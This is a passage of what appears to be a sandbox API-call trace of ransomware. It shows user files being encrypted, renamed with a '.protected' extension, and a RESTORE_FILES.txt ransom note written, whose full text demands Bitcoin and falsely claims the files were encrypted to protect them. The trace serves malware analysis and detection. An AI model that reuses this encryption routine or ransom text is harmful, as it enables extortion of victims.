HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\mvnfpyukr6oly.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\mvNfPYUkR6OLy.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\mvnfpyukr6oly.wav.protected")) returned 1 [0091.223] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="Windows") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="Program Files") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="Program Files (x86)") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="$Recycle.bin") returned 1 [0091.223] lstrcmpiW (lpString1="WNMhkej.gif", lpString2="System Volume Information") returned 1 [0091.223] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrIW (lpFirst="WNMhkej.gif", lpSrch=".protected") returned 0x0 [0091.223] lstrcmpW (lpString1="WNMhkej.gif", lpString2="RESTORE_FILES.txt") returned 1 [0091.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\wnmhkej.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrW (lpFirst="WNMhkej.gif", lpSrch=".txt") returned 0x0 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrW (lpFirst="WNMhkej.gif", lpSrch=".rar") returned 0x0 [0091.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif") returned 82 [0091.223] StrStrW (lpFirst="WNMhkej.gif", lpSrch=".zip") returned 0x0 [0091.223] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.224] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.224] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.224] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.224] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.224] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.224] CloseHandle (hObject=0xd8) returned 1 [0091.224] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif.protected") returned 92 [0091.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\wnmhkej.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\WNMhkej.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\wnmhkej.gif.protected")) returned 1 [0091.225] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0091.225] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0091.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\RESTORE_FILES.txt") returned 88 [0091.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.226] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.226] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0091.226] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.226] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0091.226] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.226] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0091.227] CloseHandle (hObject=0xd4) returned 1 [0091.227] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="Windows") returned -1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="Program Files") returned -1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="Program Files (x86)") returned -1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="$Recycle.bin") returned 1 [0091.227] lstrcmpiW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="System Volume Information") returned -1 [0091.227] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrIW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".protected") returned 0x0 [0091.227] lstrcmpW (lpString1="oLzBj8lxBL7tQv00.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.227] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.227] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\olzbj8lxbl7tqv00.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".txt") returned 0x0 [0091.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".rar") returned 0x0 [0091.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav") returned 70 [0091.227] StrStrW (lpFirst="oLzBj8lxBL7tQv00.wav", lpSrch=".zip") returned 0x0 [0091.228] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.228] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.228] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.229] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.229] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.229] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.229] CloseHandle (hObject=0xd4) returned 1 [0091.229] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav.protected") returned 80 [0091.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\olzbj8lxbl7tqv00.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\oLzBj8lxBL7tQv00.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\olzbj8lxbl7tqv00.wav.protected")) returned 1 [0091.230] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.230] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="Windows") returned -1 [0091.230] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="Program Files") returned 1 [0091.231] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="Program Files (x86)") returned 1 [0091.231] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="$Recycle.bin") returned 1 [0091.231] lstrcmpiW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="System Volume Information") returned 1 [0091.231] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrIW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".protected") returned 0x0 [0091.231] lstrcmpW (lpString1="VRP9k1u4BimJGT.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0091.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\vrp9k1u4bimjgt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".txt") returned 0x0 [0091.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".rar") returned 0x0 [0091.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3") returned 68 [0091.231] StrStrW (lpFirst="VRP9k1u4BimJGT.mp3", lpSrch=".zip") returned 0x0 [0091.231] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.232] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.232] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.232] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.232] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.232] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.233] CloseHandle (hObject=0xd4) returned 1 [0091.233] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3.protected") returned 78 [0091.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\vrp9k1u4bimjgt.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\VRP9k1u4BimJGT.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\vrp9k1u4bimjgt.mp3.protected")) returned 1 [0091.234] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="Windows") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="Program Files") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="Program Files (x86)") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="$Recycle.bin") returned 1 [0091.234] lstrcmpiW (lpString1="zXg_b.png", lpString2="System Volume Information") returned 1 [0091.234] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.234] StrStrIW (lpFirst="zXg_b.png", lpSrch=".protected") returned 0x0 [0091.234] lstrcmpW (lpString1="zXg_b.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.234] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.234] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\zxg_b.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.234] StrStrW (lpFirst="zXg_b.png", lpSrch=".txt") returned 0x0 [0091.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.234] StrStrW (lpFirst="zXg_b.png", lpSrch=".rar") returned 0x0 [0091.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.235] StrStrW (lpFirst="zXg_b.png", lpSrch=".zip") returned 0x0 [0091.235] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.235] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.235] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.236] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.236] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.236] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.236] CloseHandle (hObject=0xd4) returned 1 [0091.237] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png.protected") returned 69 [0091.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\zxg_b.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\zxg_b.png.protected")) returned 1 [0091.238] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.238] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.238] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\RESTORE_FILES.txt") returned 67 [0091.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.238] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.238] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.239] lstrlenA 